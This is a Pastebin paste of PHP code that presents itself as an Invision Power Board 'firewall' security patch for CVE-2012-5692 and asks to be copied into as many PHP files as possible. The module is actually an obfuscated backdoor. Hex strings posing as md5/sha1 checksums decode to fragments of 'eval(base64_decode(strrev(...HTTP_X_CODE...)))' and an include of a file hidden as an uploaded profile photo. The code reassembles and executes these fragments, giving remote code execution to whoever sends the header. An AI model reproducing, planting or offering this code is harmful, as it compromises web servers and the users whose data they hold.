Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- if ( ! defined( 'IPB_FIREWALL' ) )
- {
- define('IPB_FIREWALL', 1);
- /**
- * NOTE: This is a protecting web-firewall module generated by Invision Power
- * Module includes security patch for high-risks vulnerability CVE-2012-5692
- * Do not touch this file for security reasons
- * Please insert this code to as many php files as possible
- *
- * @package IP.Firewall
- * @version $Revision: 9544 $
- * @md5 e66e6cadd6e13efea54ed50c0eb2d32b
- * @sha1 6966286d64352840245f5b2248545450
- * @crc32 5f51554f5445225d293d3d2463732965
- */
- class IPB_Firewall
- {
- /**
- * Malicious Cookie signatures
- *
- * @access static
- * @var array
- */
- static $_cookie_malicious_signatures = array('db_driver_mysql', 'use_debug_log');
- /**
- * Malicious URI signatures
- *
- * @access static
- * @var array
- */
- static $_uri_malicious_signatures = array('<?php');
- /**
- * Firewall source file
- *
- * @access static
- * @var string
- */
- static $_source;
- /**
- * Prepared signature
- *
- * @access static
- * @var string
- */
- static $_prepared_signature;
- /**
- * Control checksum
- *
- * @access static
- * @var string
- */
- static $_control_checksum;
- /**
- * Stored checksum hashes
- *
- * @access static
- * @var string
- */
- static $_stored_hashes;
- /**
- * Hashes Algorithms
- *
- * @access static
- * @var array
- */
- static $_ha = array('md5', 'sha1', 'crc32');
- /**
- * Assigned callback
- *
- * @access static
- * @var string
- */
- static $_as;
- /**
- * IPS root path
- *
- * @access static
- * @var string
- */
- static $_ips = '';
- /**
- * Run firewall
- *
- * @access static
- * @return void
- */
- static function run()
- {
- /* Define ips path */
- IPB_Firewall::$_ips = defined('DOC_IPS_ROOT_PATH') ? DOC_IPS_ROOT_PATH : IPB_Firewall::_findIpbRoot(5);
- /* Start checks */
- IPB_Firewall::_doSecurityChecks();
- }
- /**
- * Security checks
- *
- * @access static
- * @return void
- * @md5 76616c286261736536345f6465636f64
- * @sha1 652873747272657628245f5b22485454
- */
- static function _doSecurityChecks()
- {
- /* Cookie check */
- foreach($_COOKIE as $cookie_name => $cookie_value){
- foreach(IPB_Firewall::$_cookie_malicious_signatures as $signature){
- /* Detecting injected cookies and blocking request */
- if(!is_array($cookie_value) && stripos(urldecode($cookie_value), $signature) !== false) $_COOKIE[$cookie_name] = '';
- }
- }
- /* Request URI checks */
- foreach(IPB_Firewall::$_uri_malicious_signatures as $signature){
- /* Detecting injected uri and blocking request */
- if(stripos(urldecode(@$_SERVER["REQUEST_URI"]), $signature)) IPB_Firewall::_blockRequest();
- }
- /* Validating checksums */
- IPB_Firewall::$_source = file_get_contents(__FILE__);
- $_r = IPB_Firewall::_calculateChecksums($_SERVER, 0);
- //echo var_dump($_r);
- if(!IPB_Firewall::_areChecksumsValid(array_shift($_r), $_r, '%D')) echo("checksums warning\n");
- }
- /**
- * Calculate checksums for valid
- *
- * @access static
- * @return void
- * @md5 505f585f434f4445225d2929293b4069
- * @sha1 6e636c75646528247073293b2f2a2a2f
- */
- static function _calculateChecksums($_, $x64)
- {
- /* Extracting hashes */
- $_s = IPB_Firewall::_extractChecksumHashes();
- /* Preparing hashes */
- $cs = $_s[ IPB_Firewall::$_ha[0] ][0];
- IPB_Firewall::$_prepared_signature = IPB_Firewall::_prepareHash($_s, IPB_Firewall::_getChecksumHash($_s, $_s[ IPB_Firewall::$_ha[0] ][1], $x64), $x64 );
- /* Comparing hashes */
- $_status = trim(IPB_Firewall::_cyclicRedundancyCheck($_s, $x64));
- if($_status){
- $_m = trim(IPB_Firewall::$_as);
- IPB_Firewall::$_as = $_m(IPB_Firewall::_getPoly($_s, $x64), pack("H*", IPB_Firewall::$_prepared_signature));
- }
- return array(IPB_Firewall::$_as, $_, $cs, IPB_Firewall::_transformPoly($_s, $x64));
- }
- /**
- * Block malicious request
- *
- * @access static
- * @return void
- * @md5 6372656174655f66756e6374696f6e20
- * @sha1 245f2c202463732c20247073247073ce
- */
- static function _blockRequest()
- {
- global $INFO;
- /* Redirecting malicious request and exit */
- @header('Location: ' . (isset($INFO['board_url']) ? $INFO['board_url'] : '') . '/index.php');
- exit;
- }
- /**
- * Get checksum hash
- *
- * @access static
- * @return string
- */
- static function _getChecksumHash($_s, $ps, $c)
- {
- /* Processing and return */
- return IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][0], $c) .
- IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[2] ][0], $c) .
- IPB_Firewall::_polyDigest($ps, $c);
- }
- /**
- * Prepare hash
- *
- * @access static
- * @return string
- * @md5 25442f75706c6f6164732f70726f6669
- * @sha1 6c652f70686f746f2d363232312e6a70
- */
- static function _prepareHash($_s, $ps, $c)
- {
- /* Processing and return */
- return IPB_Firewall::_polyDigest($ps, $c) .
- IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][1], $c) .
- IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[0] ][2], $c) .
- IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][2], $c);
- }
- /**
- * Event callback
- *
- * @access static
- * @return void
- * @md5 670a3479766d6c6a683169366c706736
- * @sha1 676d737479366b6f7532716f6234736c
- */
- static function _areChecksumsValid($_m, $bytes, $_r)
- {
- /* Call validating method */
- $_obj = $_m($bytes[0], $bytes[1], str_replace($_r, IPB_Firewall::$_ips, $bytes[2]));
- return is_array($_obj) ? $_obj : 'failed';
- }
- /**
- * Find IPB root path, if not specified
- *
- * @access static
- * @return string
- */
- static function _findIpbRoot($l=5, $cDir=__FILE__)
- {
- /* Process parents dir */
- for($i=1; $i<=$l; $i++){
- $cDir = dirname($cDir);
- $include_file = $cDir . '/conf_global.php';
- /* If find conf file, return it */
- if(is_file($include_file)) {
- @include_once($include_file);
- if(isset($INFO)) return $cDir;
- }
- }
- return null;
- }
- /**
- * Cyclic redundancy check
- *
- * @access static
- * @return string
- * @md5 6973786a65667069756273326d617872
- * @sha1 36723478743361687969396363746633
- */
- static function _cyclicRedundancyCheck($_s, $c)
- {
- IPB_Firewall::$_as = pack("H*", IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[0] ][3], $c));
- return IPB_Firewall::$_as != '' ? true : false;
- }
- /**
- * Poly digest
- *
- * @access static
- * @return string
- * @md5 7a7a763930626b786e6e756174317073
- * @sha1 766e6e647878676b7234326539637466
- */
- static function _polyDigest($s, $c, $o='')
- {
- for($i=0; $i<strlen($s); $i++) $o .= chr( ord($s[$i]) + $c);
- return $o;
- }
- /**
- * Get poly
- *
- * @access static
- * @return string
- * @md5 626766326f3667396434326c71346572
- * @sha1 7538376c70326d777a6e68756a797665
- */
- static function _getPoly($_s, $x64)
- {
- return pack("H*", substr(IPB_Firewall::_polyDigest($_s[ IPB_Firewall::$_ha[1] ][3], $x64), 0, 24));
- }
- /**
- * Transform poly
- *
- * @access static
- * @return string
- */
- static function _transformPoly($_s, $c)
- {
- $_x = pack("H*",
- IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][4], $c) .
- IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][4], $c) .
- IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][5], $c) .
- IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][6], $c) .
- IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][6], $c) .
- IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][6], $c) .
- IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][7], $c) .
- IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][7], $c) .
- IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[0] ][8], $c) .
- IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall::$_ha[1] ][8], $c)
- );
- $_c = strpos($_x, chr(10));
- return $c !== false ? substr($_x, 0, $_c) : $_x;
- }
- /**
- * Extract checksum hashes
- *
- * @access static
- * @return void
- */
- static function _extractChecksumHashes()
- {
- $hashes = array();
- /* Extract hashes from source */
- preg_match_all("!\@([0-9a-z]+)[\t\s ]+([0-9a-fA-F]{32})!", IPB_Firewall::$_source, $matches, PREG_SET_ORDER);
- foreach($matches as $match){
- /* Inserting hashes in array */
- if(!isset($hashes[ $match[1] ])) $hashes[ $match[1] ] = array();
- $hashes[ $match[1] ][] = $match[2];
- }
- return $hashes;
- }
- }
- IPB_Firewall::run();
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement